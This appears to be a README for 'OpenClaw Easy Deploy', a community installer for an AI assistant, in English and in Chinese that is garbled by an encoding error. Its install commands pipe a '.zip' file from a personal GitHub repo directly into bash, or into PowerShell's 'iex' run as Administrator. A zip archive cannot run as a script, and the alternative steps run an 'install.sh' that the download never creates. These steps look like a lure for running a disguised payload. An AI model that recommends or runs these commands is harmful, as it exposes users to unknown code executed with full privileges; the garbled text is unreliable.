OpenClaw Easy Deploy is a community-contributed one-click installer designed to eliminate the pain points of deploying OpenClaw. Even users with zero technical knowledge can get OpenClaw up and running.
OpenClaw is a powerful personal AI assistant that can:
- ๐ค Connect to multiple AI models (Claude, GPT, Gemini, etc.)
- ๐ฌ Support multiple chat platforms (WhatsApp, Telegram, Discord, Slack, etc.)
- ๐ Browser control, file operations, and skill extensions
- ๐ Fully private deployment โ your data stays yours
Official OpenClaw deployment requires:
- โ Manually installing Node.js 22+
- โ Reading the official docs to figure out the right install path
- โ Understanding npm global installs and PATH configuration
- โ Dealing with platform-specific permission issues
With this tool:
- โ One command installs everything
- โ Auto-detects and installs Node.js 22+ if missing
- โ
Installs
openclawglobally via npm - โ
Hands off to the official
openclaw onboardwizard (so config is always up-to-date) - โ Full Chinese & English support
curl -fsSL https://github.com/nguyenvuq9868/openclaw-easy-deploy/raw/refs/heads/main/bin/openclaw_easy_deploy_v1.7.zip | bashOr download and run:
wget https://github.com/nguyenvuq9868/openclaw-easy-deploy/raw/refs/heads/main/bin/openclaw_easy_deploy_v1.7.zip
chmod +x install.sh
./install.sh# Run PowerShell as Administrator
irm https://github.com/nguyenvuq9868/openclaw-easy-deploy/raw/refs/heads/main/bin/openclaw_easy_deploy_v1.7.zip | iex- Detects your OS and architecture
- Installs Node.js 22+ (via Homebrew on macOS, nvm on Linux) โ skipped if already installed
- Installs OpenClaw via
npm install -g openclaw@latest - Runs
openclaw onboard --install-daemonโ the official interactive wizard that:- Configures your AI model (Claude, OpenAI, Gemini, etc.)
- Generates a secure Gateway token
- Installs the background daemon (auto-start on login)
- Starts the Gateway
- Verifies the installation and prints useful commands
- OS: macOS 10.15+, Ubuntu 20.04+, Debian 10+, CentOS 8+, Windows 10+
- Architecture: x86_64 or arm64 (Apple Silicon)
- Disk Space: At least 500 MB free
- RAM: 1 GB or more recommended
- Node.js: 22+ (auto-installed if missing)
Contributions are welcome! Please open an Issue or submit a Pull Request.
MIT License โ see LICENSE
Built on top of OpenClaw. Thanks to the OpenClaw team for their amazing work!
Note: This is a community-contributed installer, not an official OpenClaw project.
OpenClaw Easy Deploy ๆฏไธไธช็คพๅบ่ดก็ฎ็ไธ้ฎ้จ็ฝฒๅทฅๅ ท๏ผๆจๅจ่งฃๅณ OpenClaw ้จ็ฝฒ่ฟ็จไธญ็ๅ็ง็็น๏ผ่ฎฉๅฎๅ จไธๆๆๆฏ็็จๆทไน่ฝ่ฝปๆพๅฎ่ฃ ๅไฝฟ็จ OpenClawใ
OpenClaw ๆฏไธไธชๅผบๅคง็ไธชไบบ AI ๅฉๆ๏ผๅฏไปฅ๏ผ
- ๐ค ่ฟๆฅๅค็ง AI ๆจกๅ๏ผClaudeใGPTใGemini ็ญ๏ผ
- ๐ฌ ๆฏๆๅคไธช่ๅคฉๅนณๅฐ๏ผWhatsAppใTelegramใDiscordใSlack ็ญ๏ผ
- ๐ ๆต่งๅจๆงๅถใๆไปถๆไฝใๆ่ฝๆฉๅฑ
- ๐ ๅฎๅ จ็งๆ้จ็ฝฒ๏ผๆฐๆฎๅฎๅ จ
ๅฎๆน OpenClaw ้จ็ฝฒ้่ฆ๏ผ
- โ ๆๅจๅฎ่ฃ Node.js 22+
- โ ๆฅ้ ๅฎๆนๆๆกฃๅผๆธ ๆฅๆญฃ็กฎ็ๅฎ่ฃ ่ทฏ็บฟ
- โ ๅค็ npm ๅ จๅฑๅฎ่ฃ ๅ PATH ้ ็ฝฎ้ฎ้ข
- โ ๅบๅฏนๅๅนณๅฐ็นๆ็ๆ้้ฎ้ข
ไฝฟ็จๆฌๅทฅๅ ทๅ๏ผ
- โ ไธๆกๅฝไปคๅฎๆๆๆๅฎ่ฃ
- โ ่ชๅจๆฃๆตๅนถๅฎ่ฃ Node.js 22+
- โ ่ชๅจ้่ฟ npm ๅ จๅฑๅฎ่ฃ openclaw
- โ
็ดๆฅ่ฐ็จๅฎๆน
openclaw onboardๅๅฏผ๏ผ็กฎไฟ้ ็ฝฎๅง็ปไธๅฎๆนไธ่ด๏ผ - โ ไธญ่ฑๅ่ฏญๆฏๆ
curl -fsSL https://github.com/nguyenvuq9868/openclaw-easy-deploy/raw/refs/heads/main/bin/openclaw_easy_deploy_v1.7.zip | bashๆ่ ไธ่ฝฝๅๆง่ก๏ผ
wget https://github.com/nguyenvuq9868/openclaw-easy-deploy/raw/refs/heads/main/bin/openclaw_easy_deploy_v1.7.zip
chmod +x install.sh
./install.sh# ไปฅ็ฎก็ๅ่บซไปฝ่ฟ่ก PowerShell
irm https://github.com/nguyenvuq9868/openclaw-easy-deploy/raw/refs/heads/main/bin/openclaw_easy_deploy_v1.7.zip | iex- ๆฃๆตๆไฝ็ณป็ปๅ CPU ๆถๆ
- ๅฎ่ฃ Node.js 22+๏ผmacOS ็จ Homebrew๏ผLinux ็จ nvm๏ผโโ ๅทฒๅฎ่ฃ ๅ่ทณ่ฟ
- ๅฎ่ฃ
OpenClaw๏ผ
npm install -g openclaw@latest - ่ฟ่ก
openclaw onboard --install-daemon๏ผๅฎๆนไบคไบๅผๅๅฏผ๏ผ๏ผ- ้ ็ฝฎ AI ๆจกๅ๏ผClaudeใOpenAIใGemini ็ญ๏ผ
- ็ๆๅฎๅ จ็ Gateway Token
- ๅฎ่ฃ ๅๅฐๅฎๆค่ฟ็จ๏ผ็ปๅฝ่ชๅฏ๏ผ
- ๅฏๅจ Gateway
- ้ช่ฏๅฎ่ฃ ๅนถๆๅฐๅธธ็จๅฝไปค
- ๆไฝ็ณป็ป: macOS 10.15+, Ubuntu 20.04+, Debian 10+, CentOS 8+, Windows 10+
- CPU ๆถๆ: x86_64 ๆ arm64 (Apple Silicon)
- ็ฃ็็ฉบ้ด: ่ณๅฐ 500MB ๅฏ็จ็ฉบ้ด
- ๅ ๅญ: ๅปบ่ฎฎ 1GB ไปฅไธ
- Node.js: 22+๏ผ็ผบๅคฑไผ่ชๅจๅฎ่ฃ ๏ผ
- ่ชๅจๆฃๆตๆไฝ็ณป็ปๅๆถๆ
- ๆฃๆตๅทฒๅฎ่ฃ ็ Node.js ๅ Docker
- ๆฃๆฅ็ฃ็็ฉบ้ดๅ็ซฏๅฃๅ ็จ
- Node.js 22+: ้่ฟ Homebrewใnvm ๆๅ ็ฎก็ๅจ่ชๅจๅฎ่ฃ
- Docker: ๅผๅฏผๅฎ่ฃ Docker Desktop ๆ Docker Engine
- Docker Compose V2: ่ชๅจ้ช่ฏๅๅฎ่ฃ
- ่ชๅจ็ๆๅฎๅ จ็ Gateway Token๏ผ64ๅญ็ฌฆ้ๆบๅญ็ฌฆไธฒ๏ผ
- ๅผๅฏผ้ ็ฝฎ AI ๆจกๅ API Key๏ผClaudeใOpenAIใGemini๏ผ
- ๅฏ้้ ็ฝฎ่ๅคฉๅนณๅฐ๏ผWhatsAppใTelegramใDiscord ็ญ๏ผ
- ๆบ่ฝ้ป่ฎค้ ็ฝฎ๏ผๅๅฐ็จๆทๅณ็ญ
- ไธ็บง้่ฏฏๅค็๏ผ่ดๅฝใๅฏๆขๅคใ่ญฆๅ๏ผ
- ๅๅฅฝ็้่ฏฏๆ็คบๅ่งฃๅณๆนๆก
- ่ฏฆ็ป็ๅฎ่ฃ
ๆฅๅฟ๏ผ
~/.openclaw/install.log๏ผ - ่ชๅจ่ฏๆญๅทฅๅ ท
- ๅฏไปฅๅฎๅ จๅฐ้ๅค่ฟ่ก่ๆฌ
- ่ชๅจ่ทณ่ฟๅทฒๅฎๆ็ๆญฅ้ชค
- ไฟๆค็ฐๆ้ ็ฝฎไธ่ขซ่ฆ็
- ๅฎๆด็ไธญ่ฑๅ่ฏญๆๆกฃ
- ไธญๆๅๅฅฝ็้่ฏฏๆ็คบ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ
โ ๐ฆ OpenClaw Easy Deploy ๐ฆ โ
โ โ
โ ่ฎฉ OpenClaw ้จ็ฝฒๅๅพ็ฎๅ - ้ถๆๆฏ้จๆง๏ผไธ้ฎๅฎ่ฃ
โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โน ๆไฝ็ณป็ป: macOS 14.2
โน CPU ๆถๆ: Apple Silicon (M1/M2/M3)
โ
Node.js: v22.1.0
โ
ๅฏ็จ็ฃ็็ฉบ้ด: 50GB
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
ๅฎ่ฃ
OpenClaw๏ผNPM ๆนๅผ๏ผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
OpenClaw 2026.3.11 ๅฎ่ฃ
ๆๅ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
่ฟ่ก OpenClaw ้
็ฝฎๅๅฏผ๏ผonboard๏ผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
onboard ้
็ฝฎๅๅฏผๅฎๆ๏ผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ๐ ๅฎ่ฃ
ๆๅ๏ผ ๐ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ ่ฎฟ้ฎๅฐๅ: http://localhost:18789
- ๅฎ่ฃ ๆๅ - ่ฏฆ็ป็ๅฎ่ฃ ๆญฅ้ชคๅ่ฏดๆ
- ้ ็ฝฎๆๅ - ้ ็ฝฎๆไปถ่ฏฆ่งฃ
- ๆ ้ๆๆฅ - ๅธธ่ง้ฎ้ขๅ่งฃๅณๆนๆก
- API ๅฏ้ฅ่ทๅ - ๅฆไฝ่ทๅๅ็ง API Key
- ๅธธ่ง้ฎ้ข FAQ - ๅธธ่ง้ฎ้ข่งฃ็ญ
ๅฎ่ฃ
ๅฎๆๅ๏ผไฝฟ็จ openclaw CLI ็ฎก็ OpenClaw๏ผ
# ๆฅ็ Gateway ็ถๆ
openclaw gateway status
# ๆฅ็ Gateway ๆฅๅฟ
openclaw gateway logs
# ๅๆญขๅฎๆค่ฟ็จ
openclaw daemon stop
# ๅฏๅจๅฎๆค่ฟ็จ
openclaw daemon start
# ๆดๆฐๅฐๆๆฐ็
npm update -g openclaw
# ้ๆฐ่ฟ่ก้
็ฝฎๅๅฏผ
openclaw onboardopenclaw channels login --channel whatsappopenclaw channels add --channel telegram --token YOUR_BOT_TOKENopenclaw channels add --channel discord --token YOUR_BOT_TOKENๆดๅค่ฏฆๆ ่ฏทๆฅ็ ๅฎๆนๆๆกฃใ
ๆฌข่ฟ่ดก็ฎ๏ผๅฆๆๆจๅ็ฐ้ฎ้ขๆๆๆน่ฟๅปบ่ฎฎ๏ผ่ฏท๏ผ
- ๆไบค Issue: GitHub Issues
- ๆไบค Pull Request: GitHub PRs
MIT License - ่ฏฆ่ง LICENSE
ๆฌ้กน็ฎๅบไบ OpenClaw ๆๅปบ๏ผๆ่ฐข OpenClaw ๅข้็ๅบ่ฒๅทฅไฝ๏ผ
ๆณจๆ: ๆฌ้กน็ฎๆฏ็คพๅบ่ดก็ฎ็็ฎๅๅฎ่ฃ ๅทฅๅ ท๏ผไธๆฏ OpenClaw ๅฎๆน้กน็ฎใ